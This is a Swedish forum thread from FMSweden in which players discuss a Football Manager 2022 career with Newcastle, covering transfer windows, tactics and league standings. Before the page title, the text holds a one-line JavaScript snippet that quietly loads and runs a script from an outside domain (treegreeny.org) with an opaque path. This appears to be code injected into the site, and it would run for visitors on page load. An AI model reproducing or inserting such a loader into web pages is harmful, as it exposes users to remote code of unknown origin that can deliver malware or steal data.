;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM22] Newcastle mot toppen – Avslutade rapporter – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[FM22] Newcastle mot toppen

6 Inlägg
2 Users
2 Reactions
910 Visningar
(@mrmittbena)
Active Member
Blev medlem: 4 år sedan
Inlägg: 6
Topic starter  

Då min kära FM-familj, då var det dags att sätta tänderna i FM22. Jag har tänkt länge och noggrant för att komma på en helt unik save som ingen annan kan ha kommit på, och det landade på att ta över Newcastle och ha som mål att vinna champions league inom 4 år. Jag fattar att detta inte är en jättesexig save precis och jag skaffar den i ett syfte för att jag tycker det är ett väldigt intressant experiment i hur man spenderar en stor budget på bästa vis i potential och/eller direkta resultat spelare. Ifall ni också har skapat en Newcastle-save så är jag väldigt nyfiken på hur du har spenderat dina pengar och höra hur det gått för dig. 

Så, jag ska inte hålla det på transfer-fönstret längre. Deadline-day har precis stängt och jag har detta fönstret värvat och sålt:

In:
- Jamal Musiala - 48,5M Euro (58M)
- Mateo Musacchio - Free Transfer
- Dani Olmo - 70M euro (79M)
- Renan Lodi - 23M Euro (27.5M)
- Kieran Trippier - 25M Euro (27,5M)
- Alexander Isak - 33M Euro (45,5M)
- Matthias Ginter - 16M Euro (24M)
- Corentin Tolisso - 6.25M Euro
- Aaron Ramsey - 1,9M Euro

Ut:
- Javi Manquillo - 2,5M Euro
- Isaac Hayden - 5M Euro
- Joelinton - 3,2M Euro

Både Isak och Musiala har utköps-klausuler i sina kontrakt på 66M respektive 93M Euro. Isaks klausul är lite för lågt för mitt tycke och hoppas förlänga länga kontraktet inom ett ¨år där jag antingen kan skriva av det helt eller höja det markant så att man i alla fall kan få en högra avkastning än 20,5M Euro. 
Överlag så tycker jag att det är ett helt okej fönster, men att det säkert finns en jäkla massa saker som kunde gjorts bättre och skulle tycka det vore kul att höra eran input kring just det.

Med dessa övergångar klara så har jag startat något liknande de 3 första matcherna i PL (4-2-2-2 wingers)

              Isak     Wilson

Musiala                          Saint-Max

            Ramsey    Tolisso

 Lodi     Ginter     Musacchio   Trippier

                    Darlow

Det har blivit vinst med 0-1, 0-1 de två första matcherna på bortaplan mot Norwich och Burnley och sen 0-0 hemma mot Wolves. Jag har inte startat med Olmo för att han vart på semester ända tills matchen mot Wolves och nu gick han precis och skadade sig i 2 månader. 

Det var allt för denna gången. Bara att fråga om ni undrar något.


   
Micke reacted
Citera
(@mrmittbena)
Active Member
Blev medlem: 4 år sedan
Inlägg: 6
Topic starter  

Och DÄR var vinter-fönstret stängt och det blev betydligt lugnare än senast. De som välkomnas till norra England blir

- Dani Ceballos - 1,2M Euro
- Riqui Puig - 1M Euro
- Moussa Wagué - 650K Euro

Ut gick Ciaran Clark och Mark Gillespie för 1 mille var. 

Min säsong har gått över all förväntan och jag ligger nu 3a efter 24 omgångar spelade med Man City 3 poäng efter och en match mindre spelad. Det viktiga är dock att jag har 9 poäng ner till 5an Arsenal och det börjar dofta CL med lite tur. 

Jag gjorde även en ny taktik som jag började med efter omgång 3, Detta är en osymetrisk uppställning med Renan lodi som ytterback, Ginter och Lascelles som mittbackar. Trippier har jag flyttat upp som Wing Back och har Tolisso som Defensiv mittfältare. Ovanför där har jag Ramsey och Musiala som Box till Box mittfältare respektive Mezzala. Oavanför där har jag valt att inte använda mig av en högerytter av något slag, utan flyttat in den psotionen till en offensiv mittfältare som Olmo nu sköter efter all sin skadehistorik och Saint-Maximin som inverterad forward till vänster. Alexander Isak gör sitt uppe på topp som pressande forward, men har även fått spela en del på vänsterkanten då Callum Wilson är en jävla legend som vi alla vet (11 mål). 

 

This post was modified 3 år sedan by Mrmittbena

   
SvaraCitera
(@fasteddy)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 24
 

Kul och se! Jag kör också Newcastle. 

This post was modified 3 år sedan 2 times by Fasteddy

   
SvaraCitera
(@mrmittbena)
Active Member
Blev medlem: 4 år sedan
Inlägg: 6
Topic starter  

@fasteddy Snudd på läskigt likt transferfönster, ångrar lite att jag inte gick för den unge holländske legenden Grevanbechenbachen och Niklas Sule är helt klart bättre än Ginter, hoppades på att plocka honom gratis, men hade inte inte en chans mot de stora stygga vargarna! Riktigt kul o se att det går bra i ligan för dig, ser fram emot att följa dina framgångar 🙂


   
SvaraCitera
(@fasteddy)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 24
 

@mrmittbena 

Sanningen är att jag sneglade på dina transfers innan mitt fönster stängde 🙂

Ja vi fortsätter och uppdatera här i tråden, spännande och se hur det går för dig också!


   
SvaraCitera
(@mrmittbena)
Active Member
Blev medlem: 4 år sedan
Inlägg: 6
Topic starter  

Första säsongen är slut och det blev en succé enligt mig i alla fall då vi hamnade på en tredjeplats och en direkt kvalificering till CL. Isak var en målspruta med 24 mål i PL och Olmo en assist-kung med 13 assist. 

Till sommartransfern så fick jag 100M Euro att leka med och såhär blev det.

In:

- Marcus Edwards - 20M (25M)
- Fikayo Tomori - 37,5M (55M)
- Goncalo Inácio - 32,5M (40M)
- Dominik Livacovic - 10,5M (13M)
- Owen Wijndal - 6,5M
- Boubacar Kamara - Free Transfer
- Rayan cherki - Rakt byte med Lewis 
- Karim Adeyemi - 13,25M (16,25M)
- Rodrigo Bentancur - 27,5M (42M)
- Dan-Axel Zagadou - Free Transfer
- Heorhii Sudakov - Martin Dubravka + jag fick 7,5M
- Maarten Vandevoordt - 5,2M
- Dominic Calvert-Lewin - 54M (75M)

Nämnvärda ut:

- Alexander Isak - 66M (klausul)
- Jamal Lewis - Byte (läs ovan)
- Mateo M . 1M
- Fabian Scchär - Free

Så detta fönströt har jag valt att bygga om hela min centrala backlinje, stärka och föryngra något min målvakt uppställning och enligt mitt tycke förstärka mitt mittfält ordentligt med Bentancur. Har även försökt när som möjligt att värva Engelskt och där det syns mest är i mina värvningar av DCL och Marcus Edwards där jag hellre hade valt att värva annat för de pengarna och positionerna men har fått inse att regestreringskraven kan bli ett problem annars.

Nu har det även spelats 8 matcher i PL och det har vart rent helvete. Mina spelare kan inte göra enkla passningar, de vet inte hur man försvarar mot långa djupledsbollar, De kan inte göra mål på frilägen och jag tror Trippier har sprungit med bollen HEEEELT opressad och tappat ut den till inkast. Så, nu när jag fått skriva av mig kring det så ligger vi på en 7e plats med 12 poäng och är redan 12 poäng efter Arsenal på 1a plats. Då har iofs 6 av de 8 första matcherna varit på bortaplan och jag har redan mött Man U, Man C, Arsenal och min nästa match är mot Chelsea. 

Dessa tråkiga resultat och usla spel har fått mig att försöka byta system och uppställning, är för tidigt att säga något än men ett 0-0 resultat mot Man C hemma är ändå godtyckligt.

I min CL-grupp har jag Bayern, Roma och Olympiacos. Så min målsättning är att komma tvåa och mitt krav är att komma minst 3a och EL ur denna grupp. 


   
SvaraCitera
Share: